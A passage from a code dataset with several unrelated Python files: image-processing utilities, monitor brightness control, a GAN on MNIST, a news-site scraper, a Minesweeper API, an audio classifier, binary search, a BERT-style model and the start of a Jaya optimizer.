gaussian_kernel_2d(kernel_size=3, sigma=0.):\n kx = cv2.getGaussianKernel(kernel_size, sigma)\n ky = cv2.getGaussianKernel(kernel_size, sigma)\n return np.multiply(kx, np.transpose(ky))\n\n\ndef 
truncation_normal_distribution(standard_variance):\n return tf.truncated_normal_initializer(0.0, standard_variance)\n\n\ndef structural_similarity_index_metric(feature, labels):\n c1 = 0.01 ** 2\n c2 = 0.03 ** 2\n weight = gaussian_kernel_2d(11, 1.5)\n weight = tf.constant(weight)\n weight = tf.reshape(weight, [11, 11, 1, 1])\n weight = tf.cast(weight, tf.float32)\n mean_f = tf.nn.conv2d(feature, weight, [1, 1, 1, 1], padding=\"SAME\")\n mean_y = tf.nn.conv2d(labels, weight, [1, 1, 1, 1], padding=\"SAME\")\n mean_f_mean_y = tf.multiply(mean_f, mean_y)\n square_mean_f = tf.multiply(mean_f, mean_f)\n square_mean_y = tf.multiply(mean_y, mean_y)\n variance_f = tf.nn.conv2d(tf.multiply(feature, feature), weight, [1, 1, 1, 1], padding=\"SAME\") - square_mean_f\n variance_y = tf.nn.conv2d(tf.multiply(labels, labels), weight, [1, 1, 1, 1], padding=\"SAME\") - square_mean_y\n variance_fy = tf.nn.conv2d(tf.multiply(feature, labels), weight, [1, 1, 1, 1], padding=\"SAME\") - mean_f_mean_y\n ssim = ((2*mean_f_mean_y + c1)*(2*variance_fy + c2)) / \\\n ((square_mean_f + square_mean_y + c1)*(variance_f + variance_y + c2))\n return 1 - tf.reduce_mean(ssim, reduction_indices=[1, 2, 3])\n\n\ndef get_density_map_gaussian(N, M, points, adaptive_kernel=False, fixed_value=15):\n density_map = np.zeros([N, M], dtype=np.float32)\n h, w = density_map.shape[:2]\n num_gt = np.squeeze(points).shape[0]\n if num_gt == 0:\n return density_map\n\n if adaptive_kernel:\n # referred from https://github.com/vlad3996/computing-density-maps/blob/master/make_ShanghaiTech.ipynb\n leafsize = 2048\n tree = scipy.spatial.KDTree(points.copy(), leafsize=leafsize)\n distances = tree.query(points, k=4)[0]\n\n for idx, p in enumerate(points):\n p = np.round(p).astype(int)\n p[0], p[1] = min(h-1, p[1]), min(w-1, p[0])\n if num_gt > 1:\n if adaptive_kernel:\n sigma = int(np.sum(distances[idx][1:4]) // 3 * 0.3)\n else:\n sigma = fixed_value\n else:\n sigma = fixed_value # np.average([h, w]) / 2. 
/ 2.\n sigma = max(1, sigma)\n\n # filter_mask = np.zeros_like(density_map)\n # gaussian_center = (p[0], p[1])\n # filter_mask[gaussian_center] = 1\n # density_map += gaussian_filter(filter_mask, sigma, mode='constant')\n\n # If you feel that the scipy api is too slow (gaussian_filter) -- Substitute it with codes below\n # could make it about 100+ times faster, taking around 2 minutes on the whole ShanghaiTech dataset A and B.\n\n gaussian_radius = sigma * 3\n gaussian_map = np.multiply(\n cv2.getGaussianKernel(gaussian_radius*2+1, sigma),\n cv2.getGaussianKernel(gaussian_radius*2+1, sigma).T\n )\n x_left, x_right, y_up, y_down = 0, gaussian_map.shape[1], 0, gaussian_map.shape[0]\n # cut the gaussian kernel\n if p[1] < 0 or p[0] < 0:\n continue\n if p[1] < gaussian_radius:\n x_left = gaussian_radius - p[1]\n if p[0] < gaussian_radius:\n y_up = gaussian_radius - p[0]\n if p[1] + gaussian_radius >= w:\n x_right = gaussian_map.shape[1] - (gaussian_radius + p[1] - w) - 1\n if p[0] + gaussian_radius >= h:\n y_down = gaussian_map.shape[0] - (gaussian_radius + p[0] - h) - 1\n density_map[\n max(0, p[0]-gaussian_radius):min(density_map.shape[0], p[0]+gaussian_radius+1),\n max(0, p[1]-gaussian_radius):min(density_map.shape[1], p[1]+gaussian_radius+1)\n ] += gaussian_map[y_up:y_down, x_left:x_right]\n return density_map","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"362963176","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Copyright © 2016 Martin Ueding <martin-ueding.de>\n# Licensed under The MIT License\n\nimport subprocess\n\n\ndef set_brightness(brightness, device):\n assert 0 <= brightness <= 100, 'Brightness must be between 0 and 100.'\n\n command = ['ddccontrol',\n '-r', '0x10',\n '-w', str(brightness),\n 'dev:/dev/i2c-{}'.format(device)]\n status = subprocess.call(command)\n\n if status != 0:\n print('ddccontrol failed but it might still have worked')\n\n\ndef set_maximum_color(red, green, blue, device):\n assert 0 <= red <= 100, 'Red must be between 0 and 100.'\n assert 0 <= green <= 100, 'Green must be between 0 and 100.'\n assert 0 <= blue <= 100, 'Blue must be between 0 and 100.'\n\n addresses = ['0x16', '0x18', '0x1a']\n\n for address, value in zip(addresses, [red, green, blue]):\n command = ['ddccontrol',\n '-r', address,\n '-w', str(value),\n 'dev:/dev/i2c-{}'.format(device)]\n status = subprocess.call(command)\n\n if status != 0:\n print('ddccontrol failed but it might still have worked')\n","sub_path":"externalbrightness/ddccontrol.py","file_name":"ddccontrol.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"489772924","text":"\n# coding: utf-8\n\n# In[8]:\n\n# Run some setup code for this notebook.\n\nimport random\nimport numpy as np\nfrom cs231n.data_utils import load_CIFAR10\nimport matplotlib.pyplot as plt\n\nimport sys\nimport os\nimport time\nfrom __future__ import print_function\n#from adversarial import\nimport time\nimport theano\nimport gzip\nimport lasagne\nimport lasagne.layers as L\nimport theano.tensor as T\n\nfrom lasagne import nonlinearities\nfrom lasagne.updates import sgd, momentum\nfrom lasagne.init import Normal\n\nimport seaborn as sns\nfrom scipy.stats import norm\n\n\nget_ipython().magic(u'matplotlib inline')\nplt.rcParams['figure.figsize'] = (3,3) # set default size of 
plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nget_ipython().magic(u'load_ext autoreload')\nget_ipython().magic(u'autoreload 2')\n\ndef load_mnist_images(filename):\n if not os.path.exists(filename):\n download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, 1, 28, 28)\n return data\n\ndef load_mnist_labels(filename):\n if not os.path.exists(filename):\n download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n return data\n\n # We can now download and read the training and test set images and labels.\nX_train = load_mnist_images('train-images-idx3-ubyte.gz')\ny_train = load_mnist_labels('train-labels-idx1-ubyte.gz')\nX_test = load_mnist_images('t10k-images-idx3-ubyte.gz')\ny_test = load_mnist_labels('t10k-labels-idx1-ubyte.gz')\n#if you want to use CIFAR10 to test,please use the following:\n#X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)\n#X_train = np.reshape(X_train, (X_train.shape[0], -1))\n#X_test = np.reshape(X_test, (X_test.shape[0], -1))\n#X_train=X_train/np.float32(256)\n#X_test=X_test/np.float32(256)\n\nX_train = np.reshape(X_train, (X_train.shape[0], -1))\nX_test = np.reshape(X_test, (X_test.shape[0], -1))\nX_train=X_train[:10000]\ny_train=y_train[:10000]\n#test for ONE class\n#y=5\n#idxs = np.flatnonzero(y_train == y)\n#X_train=X_train[idxs]\n#y_train=y_train[idxs]\n\n#make all are true iamge\n#y_train=y_train-y_train+1\n#y_test=y_test-y_test+1\n#X_train[:]=(X_train[:]-np.mean(X_train[:]))/np.std(X_train[:])\nX_train=X_train/np.float32(256)\nprint(X_train.shape)\nprint(y_train.shape)\nplt.subplot(1,1,1)\nplt.imshow(X_train[0].reshape(28,28))\nplt.axis('off')\nplt.show()\n\n\n# In[9]:\n\ndef mlp_g(h_size,nl=nonlinearities.tanh,mid=nonlinearities.tanh):\n# assert len(h_size) > 1, \"Must have at least two layers!\"\n# nld['tanh']=nonlinearities.tanh\n# nld['sigmoid']=nonlinearities.sigmoid\n# nl=nld[cho]\n layer = L.InputLayer(shape=(None, h_size[0]))\n for size in h_size[1:-1]:\n # layer = L.DenseLayer(L.dropout(layer, 0.5), s)\n layer = L.DenseLayer(layer, size, W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=mid)\n#my:change\n return L.DenseLayer(layer, h_size[-1], W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=nl)\ndef mlp_d(h_size,nl=nonlinearities.tanh,mid=nonlinearities.tanh):\n# assert len(h_size) > 1, \"Must have at least two layers!\"\n# nld['tanh']=nonlinearities.tanh\n# nld['sigmoid']=nonlinearities.sigmoid\n# nl=nld[cho]\n layer = L.InputLayer(shape=(None, h_size[0]))\n for size in h_size[1:-1]:\n layer = L.DenseLayer(layer, size, W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=mid)\n layer = L.DropoutLayer(layer,p=0.5,rescale=True)\n#my:change\n return L.DenseLayer(layer, h_size[-1], W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=nl)\n\n\n# In[10]:\n\n#choose different batch to train every epoch\ndef iterate_minibatches(inputs, targets, batchsize, shuffle=False):\n assert len(inputs) == len(targets)\n if shuffle:\n indices = np.arange(len(inputs))\n np.random.shuffle(indices)\n for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):\n if shuffle:\n excerpt = indices[start_idx:start_idx + batchsize]\n else:\n excerpt = slice(start_idx, start_idx + batchsize)\n yield inputs[excerpt], targets[excerpt]\n\n\n# In[11]:\n\ndef make_z(n,g_size=100):\n return 
np.asarray(np.random.randn(n,g_size),dtype=np.float32)\n\n\n# In[12]:\n\nlr = 0.001\ng_size=100\nmom=0.9\n\n\n# In[13]:\n\ng_size=[g_size,500,784]\nd_size=[784,240,240,2]\n\ng_nnet = mlp_g(g_size,nl=nonlinearities.sigmoid,mid=nonlinearities.rectify)\nd_nnet = mlp_d(d_size,nl=nonlinearities.softmax,mid=nonlinearities.rectify)\n\ninput_var = T.dmatrix('inputs')\ntarget_var = T.lvector('targets')\ninput_g = T.dmatrix('inputs')\n\ng = L.get_output(g_nnet, input_g)\ndx = L.get_output(d_nnet, input_var)\ndg = L.get_output(d_nnet, g)\n\nget_dx = theano.function(inputs=[input_var], outputs=dx)\nget_g = theano.function(inputs=[input_g], outputs=g)\nget_dg= theano.function(inputs=[input_g], outputs=dg)\n#Classifier\n#loss = lasagne.objectives.categorical_crossentropy(dx,target_var)\n#d_loss = loss.mean()\n#GAN\nd_loss = -T.mean(T.log(dx[:,1]) + T.log(dg[:,0]))\ng_loss = -T.mean(T.log(dg[:,1]))\n\nd_updates = lasagne.updates.nesterov_momentum(d_loss, L.get_all_params(d_nnet,trainable=True), learning_rate=lr, momentum=mom)\ng_updates = lasagne.updates.nesterov_momentum(g_loss, L.get_all_params(g_nnet,trainable=True), learning_rate=lr, momentum=mom)\n\ntrain_d = theano.function(inputs=[input_var, input_g], outputs=d_loss, updates=d_updates)\ntrain_g = theano.function(inputs=[input_g], outputs=g_loss, updates=g_updates)\n\n#Classifier Test\n#test_prediction = L.get_output(d_nnet,input_var)\n#test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,target_var)\n#test_loss = test_loss.mean()\n#test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)\n\n#val_d = theano.function(inputs=[input_var, target_var], outputs=[test_loss, test_acc])\nval_accx=T.mean(dx[:,1])\nval_accg=T.mean(dg[:,0])\nval_d = theano.function(inputs=[input_var, input_g], outputs=[val_accx,val_accg])\n\n\n# In[14]:\n\ntrain_iters =200\npp1=0.55\npp2=0.8\nbatch_size=100\nk = 100\np = 1000\nrow=10\ncol=10\n \nhistd, histg = np.zeros(train_iters), np.zeros(train_iters)\n\nfor epoch in range(train_iters):\n start_time = time.time()\n #k update D\n td_err=0\n td_batches=0\n for j in range(k):\n for batch in iterate_minibatches(X_train, y_train, batch_size,shuffle=True):\n example_z=make_z(batch_size)\n inputs,targets=batch\n td_err+=train_d(inputs,example_z)\n td_batches+=1\n example_z=make_z(batch_size)\n test_accx,test_accg=val_d(X_train,example_z)\n if ((test_accx>pp1)and(test_accg>pp1)):\n break\n histd[epoch]=td_err/td_batches\n\n #update G\n tz_err=0\n tz_batches=0\n for j in range(p):\n example_z=make_z(batch_size)\n tz_err+=train_g(example_z)\n tz_batches+=1\n example_z=make_z(batch_size)\n dd=get_dg(example_z)\n if (pp2<np.sum(dd[:,1])/batch_size):\n break\n histg[epoch]=tz_err/tz_batches\n #Test\n example_z=make_z(batch_size)\n result=get_g(example_z)\n \n\n print(\"Epoch {} of {} took {:.3f}s\".format(epoch + 1, train_iters, time.time() - start_time))\n print(\" training loss:\\t\\t{:.6f}\".format(histd[epoch]))\n print(\" adjust G loss:\\t\\t{:.6f}\".format(histg[epoch]))\n \n if (epoch%10==0):\n plt.rcParams['figure.figsize'] = (15,15)\n for j in xrange(row*col):\n plt.subplot(row,col,j)\n plt.imshow(result[j].reshape(28,28))\n plt.axis('off')\n #plt.subplot(1,2,2)\n #plt.imshow(result.reshape(28,28))\n #plt.axis('off')\n plt.show()\n\n\n# In[ ]:\n\n\n\n","sub_path":"ref/GAN/GAN-MNIST-GAN.py","file_name":"GAN-MNIST-GAN.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} 
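# A minimal post-training sampling sketch for the GAN record above, not part of the original file: it assumes the Theano helpers make_z, get_g and get_dg compiled in that script (plus its numpy import); the batch size of 100 is illustrative only.\nexample_z = make_z(100)             # (100, 100) standard-normal noise codes\nfakes = get_g(example_z)            # (100, 784) sigmoid outputs in (0, 1)\nd_scores = get_dg(example_z)[:, 1]  # discriminator's probability of \"real\" per sample\nbest = fakes[np.argsort(-d_scores)[:10]].reshape(-1, 28, 28)  # keep the 10 most convincing digits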
+{"seq_id":"57250714","text":"# coding : utf-8\n\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\nentetes = {\n\t\"User-Agent\":\"Alexis Gohier-Drolet, requête envoyée pour un cours de data\",\n\t\"From\":\"alexis_gohier@hotmail.com\"\n}\n\nfichier = \"newScientist.csv\"\n\nfor n in range(1,493):\n\turl = \"https://www.newscientist.com/section/news/page/{}/\".format(n)\n\tprint(url)\n\n\tcontenu = requests.get(url, headers=entetes)\n\tpage = BeautifulSoup(contenu.text, \"html.parser\")\n\t# print(page)\n\n\turlArticles = page.find_all(\"h2\", class_=\"entry-title\")\n\t# print(page.find(\"h2\",class_=\"entry-title\"))\n\t# print(urlArticles)\n\n\tfor urlArticle in urlArticles:\n\t\tscientist = []\n\t\ttry:\n\t\t\turl2 = urlArticle.a[\"href\"]\n\t\t\t#print(url2)\n\t\t\turl2 = \"https://www.newscientist.com\" + url2\n\t\t\tprint(url2)\n\t\t\tscientist.append(url2)\n\n\t\t\tcontenu2 = requests.get(url2)\n\t\t\tpage2 = BeautifulSoup(contenu2.text, \"html.parser\")\n\n\t\t\ttitre = page2.title\n\t\t\t#print(titre)\n\t\t\tscientist.append(titre)\n\t\t\t# print(scientist)\n\n\t\t\t#bob = open(fichier, \"a\")\n\t\t\t#eponge = csv.writer(bob)\n\t\t\t#eponge.writerow(scientist)\n\n\t\texcept:\n\t\t\tprint(\"Rien\")\n\n\n\n","sub_path":"moisson-1.py","file_name":"moisson-1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"187855828","text":"\"\"\"\nMineSweeper Game API.\nYou can play the game in terminal.\ne.g. type 3, 0 to uncover the tile in Row_3, Col_0.\n\"\"\"\nimport random\nimport numpy as np\nDIM_1 = 9\nDIM_2 = 9\nNMINES = 8\nPICK_TIME = 1\nCOVERED = -1\n\n\n# the \"game board\", with state\nclass MineSweeper:\n def __init__(self, dim_1=DIM_1, dim_2=DIM_2, nMines=NMINES):\n # params\n self.dim1 = dim_1\n self.dim2 = dim_2\n self.totalCells = self.dim1 * self.dim2\n self.nMines = nMines\n self.mines = np.zeros([self.dim1, self.dim2])\n self.neighbors = np.zeros([self.dim1, self.dim2])\n self.state = np.zeros([self.dim1, self.dim2])\n self.state.fill(np.nan)\n self.initialized = False\n self.gameOver = False\n self.victory = False\n self.flag = np.zeros([self.dim1, self.dim2])\n\n def initialize(self, coordinates): # not run until after first selection!\n # set up mines\n # randomly place mines anywhere *except* first selected location AND surrounding cells\n # so that first selection is always a 0\n # weird, yes, but that's how the original minesweeper worked\n availableCells = range(self.totalCells)\n selected = coordinates[0] * self.dim2 + coordinates[1]\n offLimits = np.array(\n [selected - self.dim2 - 1, selected - self.dim2, selected - self.dim2 + 1, selected - 1, selected,\n selected + 1, selected + self.dim2 - 1, selected + self.dim2,\n selected + self.dim2 + 1]) # out of bounds is ok\n availableCells = np.setdiff1d(availableCells, offLimits)\n self.nMines = np.minimum(self.nMines,\n len(availableCells)) # in case there are fewer remaining cells than mines to place\n minesFlattened = np.zeros([self.totalCells])\n minesFlattened[np.random.choice(\n availableCells, self.nMines, replace=False)] = 1\n self.mines = minesFlattened.reshape([self.dim1, self.dim2])\n # set up neighbors\n for i in range(self.dim1):\n for j in range(self.dim2):\n nNeighbors = 0\n for k in range(-1, 2):\n if 0 <= i + k < self.dim1:\n for l in range(-1, 2):\n if 0 <= j + l < self.dim2 and (k != 0 or l != 0):\n nNeighbors += self.mines[i + k, j + l]\n self.neighbors[i, j] = nNeighbors\n # done\n 
self.initialized = True\n\n def clearEmptyCell(self, coordinates):\n x = coordinates[0]\n y = coordinates[1]\n self.state[x, y] = self.neighbors[x, y]\n if self.state[x, y] == 0:\n for i in range(-1, 2):\n if 0 <= x + i < self.dim1:\n for j in range(-1, 2):\n if 0 <= y + j < self.dim2:\n if np.isnan(self.state[x + i, y + j]):\n self.clearEmptyCell((x + i, y + j))\n\n def selectCell(self, coordinates):\n # condition always fails on first selection\n if self.mines[coordinates[0], coordinates[1]] > 0:\n self.gameOver = True\n self.victory = False\n else:\n if not self.initialized: # runs after first selection\n self.initialize(coordinates)\n self.clearEmptyCell(coordinates)\n if np.sum(np.isnan(self.state)) == self.nMines:\n self.gameOver = True\n self.victory = True\n\n def get_surrounding(self, row, col):\n SURROUNDING = ((-1, -1), (-1, 0), (-1, 1), (0, -1),\n (0, 1), (1, -1), (1, 0), (1, 1))\n\n neighbours = []\n for pos in SURROUNDING:\n temp_row = row + pos[0]\n temp_col = col + pos[1]\n if 0 <= temp_row < self.dim1 and 0 <= temp_col < self.dim2:\n neighbours.append((temp_row, temp_col))\n\n return neighbours\n\n\ndef getMState(map, dim_1=DIM_1, dim_2=DIM_2):\n mState = np.zeros((dim_1, dim_2))\n for row in range(dim_1):\n for col in range(dim_2):\n if np.isnan(map[row, col]):\n mState[row, col] = COVERED\n else:\n mState[row, col] = map[row, col]\n return mState\n\n\ndef dataGenerator(dataSize, pickTime, dim_1=DIM_1, dim_2=DIM_2, nMine=NMINES):\n gameState = []\n mineMap = []\n for _ in range(dataSize):\n game = MineSweeper(dim_1, dim_2, nMine)\n # Pick PICK_TIME times\n for i in range(pickTime):\n x = random.randint(0, dim_1 - 1)\n y = random.randint(0, dim_2 - 1)\n # if picks a mine or number, pick another\n if game.mines[x, y] == 1 or not np.isnan(game.state[x, y]):\n i = i - 1\n continue\n game.selectCell((x, y))\n # print(game.state)\n # exit()\n gameState.append(getMState(game.state, dim_1, dim_2))\n mineMap.append(game.mines)\n return gameState, mineMap\n\n\nif __name__ == \"__main__\":\n # Init the game\n game = MineSweeper()\n print(\"%dx%d Grid with %d Mines\" % (game.dim1, game.dim2, game.nMines))\n # Play\n while True:\n print(game.state)\n if game.victory:\n print(\"You WIN!!!\")\n break\n y, x = map(lambda var: int(var), input(\n \"(y, x) coordinate: \").split(\",\"))\n game.selectCell((y, x))\n if game.gameOver:\n print(\"BOOM!!!\")\n break\n","sub_path":"code/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"575304426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 11:21:50 2018\n\n@author: jin\n\"\"\"\n\nimport os\nimport os.path\nimport numpy as np\nimport pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport librosa\n\nDATA_PATH = '/Users/jin/Downloads/Data/'\n\ndef conv_wav_to_mfcc(path, file_full_names, max_length=15):\n wave, sr = librosa.load(path + file_full_names, mono=True, sr=None)\n wave = wave[::3]\n mfcc = librosa.feature.mfcc(wave, sr=16000)\n\n if (max_length > mfcc.shape[1]):\n pad_width = max_length - mfcc.shape[1]\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='constant')\n\n else:\n mfcc = mfcc[:, :max_length]\n \n return mfcc\n\ndef make_npy_file(full_file_names):\n mfcc_vectors = []\n for i 
in range(len(full_file_names)):\n print(i)\n mfcc = conv_wav_to_mfcc(DATA_PATH, full_file_names[i])\n mfcc_vectors.append(mfcc) \n np.save('mfcc_version.npy', mfcc_vectors)\n \n\ndef main():\n \n file_names = []\n full_file_names = []\n for filename in os.listdir(DATA_PATH):\n full_file_names.append(filename)\n name = os.path.splitext(filename)[0]\n file_names.append(name)\n full_file_names.pop(1284)\n \n df = pd.Series(file_names)\n df = pd.DataFrame(df.str.split('-',1).tolist(), columns = ['Subclass', 'Target'])\n df = df.dropna(axis = 0)\n \n \n if os.path.isfile('mfcc_version.npy')!=1:\n make_npy_file(full_file_names)\n\n X = np.load('mfcc_version.npy')\n y = df.iloc[:,1:2].values\n y = y.astype(int)\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.25, random_state=0, shuffle=True)\n \n X_train = X_train.reshape(X_train.shape[0], 20, 15, 1)\n X_test = X_test.reshape(X_test.shape[0], 20, 15, 1)\n \n y_train_category = to_categorical(y_train)\n y_test_category = to_categorical(y_test)\n \n model = Sequential()\n \n model.add(Conv2D(36, kernel_size=(2, 2), activation='relu', input_shape=(20, 15, 1)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(132, activation='relu'))\n model.add(Dropout(0.25))\n model.add(Dense(10, activation='softmax'))\n model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\n \n model.fit(X_train, y_train_category, batch_size=150, epochs=200, verbose=1, validation_data=(X_test, y_test_category))\n \nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"AudioClassML.py","file_name":"AudioClassML.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"313945445","text":"import timeit\nimport time\nimport datetime\n\n\n#\n# def Binarysearch(arr, size, value):\n# low = 0\n# high = size - 1\n# while low <= high:\n# mid = int(low + (high - low) / 2) # To avoid overflow\n# if arr[mid] == value:\n# return True\n# elif arr[mid] < value:\n# low = mid + 1\n# else:\n# high = mid - 1\n# return False\n#\n# def binary_search(a_list, item):\n# first = 0\n# last = len(a_list) - 1\n# found = False\n# while first <= last and not found:\n# midpoint = (first + last) // 2\n# if a_list[midpoint] == item:\n# found = True\n# else:\n# if item < a_list[midpoint]:\n# last = midpoint - 1\n# else:\n# first = midpoint + 1\n# return found\n#\n\ndef binary_search(arr, value):\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = low + (high - low)// 2 #此处必须用//才能得到int\n if arr[mid] == value:\n return True\n else:\n if value < arr[mid]:\n high = mid - 1\n else:\n low = mid + 1\n return False\n\n\nif __name__ == '__main__':\n test_list = [0, 1, 2, 8, 13, 17, 19, 32, 42]\n # t1 = timeit.timeit(stmt=Binarysearch(test_list,len(test_list),2), number=2)\n # print(t1)\n print(binary_search(test_list, 17))\n","sub_path":"algorithm/search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"198281002","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport random\n\nfrom ENCODER import ENCODER_pre_post_fdfd# import encoder\nfrom ENCODER import ENCODER# import encoder\n\nfrom EMBEDDING.EMBEDDING import embedding\nfrom ADD_NORM.ADD_NORM import 
add,layer_norm\nclass bert:\n    def __init__(self,lr,input_nums,hidden_nums,output_nums,max_position_dim=512,layers_encoder=12,labels_num=2,multi_head=12):#input_num=768 \n\n        self.input_nums=input_nums\n        self.max_position_dim=max_position_dim#512\n\n        self.encoders=[ENCODER_pre_post_fdfd.encoder(input_nums=input_nums,hidden_nums=hidden_nums,output_nums=output_nums,multi_head=multi_head)]+[ENCODER.encoder(input_nums=input_nums,hidden_nums=hidden_nums,output_nums=output_nums,multi_head=multi_head) for _ in range(layers_encoder-1)]\n        \n        self.embed_position=embedding(max_position_dim,input_nums)\n\n        self.w_vc=tf.Variable(tf.random.truncated_normal([output_nums,labels_num],stddev=tf.math.sqrt(2.0/(output_nums+labels_num))))\n        self.b_vc=tf.Variable(tf.zeros(labels_num))\n        \n        self.opt=tf.keras.optimizers.Adam(learning_rate=lr, beta_1=0.9, beta_2=0.98, epsilon=1e-09)\n        \n    def __call__(self,x,dropout_rate=0.1):\n        '''\n        function:bert的主体操作\n        parameter:\n        '''\n        embedd_x=x\n        \n        \n        pos=range(x.shape[1])\n\n        pos_one_hot=tf.one_hot(pos,self.max_position_dim)\n        pos_one_hot=tf.reshape(pos_one_hot,[1,pos_one_hot.shape[0],pos_one_hot.shape[-1]])\n        embedd_pos=self.embed_position.embedding_lookup(pos_one_hot)\n\n        \n        embedd_x=embedd_x+embedd_pos\n        \n        \n        output_x=embedd_x\n        \n        \n        temp=[]\n        final_output=output_x\n        for i in range(len(self.encoders)):\n            \n            output_x_2,_,_=self.encoders[i](output_x,dropout_rate)\n            output_x=output_x_2+output_x\n            output_x=layer_norm(output_x)#这里有ln代表,到最后所有的输出相加之前就已经经历了无数个ln,有嵌套的ln\n\n        \n        \n        logits=tf.matmul(output_x,self.w_vc)+self.b_vc\n\n        ppgs=tf.nn.softmax(logits)\n        #print(ppgs)\n        #print(tf.math.reduce_sum(ppgs[:,0,:]))\n        preds = tf.cast(tf.argmax(logits, axis=-1),dtype=tf.int32)\n        \n        return logits,ppgs,preds#tf.concat([mid_result,output_x],-1)#把最后结果和中间结果拼接\n    \n    \n    \n    \n    def loss_sigmoid(self,output,y):#gamma=5\n        \n        return -1.*tf.reduce_mean(tf.multiply(tf.math.log(tf.math.sigmoid(output+ 1e-10)),y)+tf.reduce_mean(tf.multiply(tf.math.log((1-tf.math.sigmoid(output+ 1e-10))),(1-y))))\n\n    def loss(self,output,y,gamma=3):#gamma=5\n        \n        return -1*tf.reduce_mean(tf.multiply(tf.multiply(tf.math.log(output+ 1e-10),y),tf.math.pow((1-output),gamma)))#Focal loss\n    def loss_ce(self,output,y):\n        return -1*tf.reduce_mean(tf.multiply(tf.math.log(output+ 1e-10),y))\n    def am_softmax_loss(self,output,y,margin=0.35,scale=30):\n        \n        y_pred = (y * (output - margin) + (1 - y) * output) * scale\n        y_pred=tf.nn.softmax(y_pred,axis=-1)\n        #print(tf.reduce_sum(tf.nn.softmax(y_pred,axis=-1)[0,0,:]))\n        \n        return self.loss_ce(y_pred,y)\n\n    def get_params_vc(self):\n        params=[]\n\n        params.append(self.w_vc)\n\n        params.append(self.b_vc)\n\n\n        return params\n\n    \n    def get_params_bert_layer(self):\n        params=[]\n\n        #params.extend(self.embed_token.get_params())\n\n        #params.extend(self.embed_position.get_params())\n        \n        params.extend([inner_cell for cell in self.encoders for inner_cell in cell.get_params()])\n\n        return params\n    \n    def get_params_bert_position(self):\n        params=[]\n\n        params.extend(self.embed_position.get_params())\n        \n        return params\n    \n    def get_params(self):\n        params=[]\n\n        #params.extend(self.embed_token.get_params())\n\n        params.extend(self.embed_position.get_params())\n        \n        params.extend([inner_cell for cell in self.encoders for inner_cell in cell.get_params()])\n\n        return params\n    \n    def update_params(self,grads,params):\n        self.opt.apply_gradients(grads_and_vars=zip(grads,params))\n    \n    def gelu(self,input_tensor):\n        #cdf = 0.5 * (1.0 + tf.math.erf(input_tensor / tf.math.sqrt(2.0)))\n\n        cdf2 = 0.5 * (1.0 + 
tf.nn.tanh((input_tensor+0.044715*tf.math.pow(input_tensor,3))*tf.math.sqrt(2.0/math.pi)))\n \n return input_tensor*cdf2\n\n \n\n\n","sub_path":"BERT_pre_post_fdfd.py","file_name":"BERT_pre_post_fdfd.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108468411","text":"# -*- coding: utf-8 -*-\nfrom .base import JayaBase\nfrom pyjaya.clasic import JayaClasic\nfrom .population import Population\nfrom .solution import Solution\nfrom multiprocessing import Process, Queue, current_process, freeze_support\nfrom multiprocessing import Pool\nimport numpy as np\n\n\nclass JayaSAMPE(JayaBase):\n\n def sprint(self, population):\n # result = population.getBestAndWorst()\n # solutions = list()\n\n numSolutions = len(population.solutions)\n jaya_clasic = JayaClasic(\n numSolutions, self.listVars, self.functionToEvaluate,\n population=population)\n if self.minimax:\n jaya_clasic.toMaximize()\n\n population = jaya_clasic.run(1)\n return population\n\n @staticmethod\n def worker(sampe, population):\n return sampe.sprint(population)\n\n def generate(self, m):\n entrada = self.population.divideInToWithElitist(m)\n # print(\" ### entradas (luego de la division 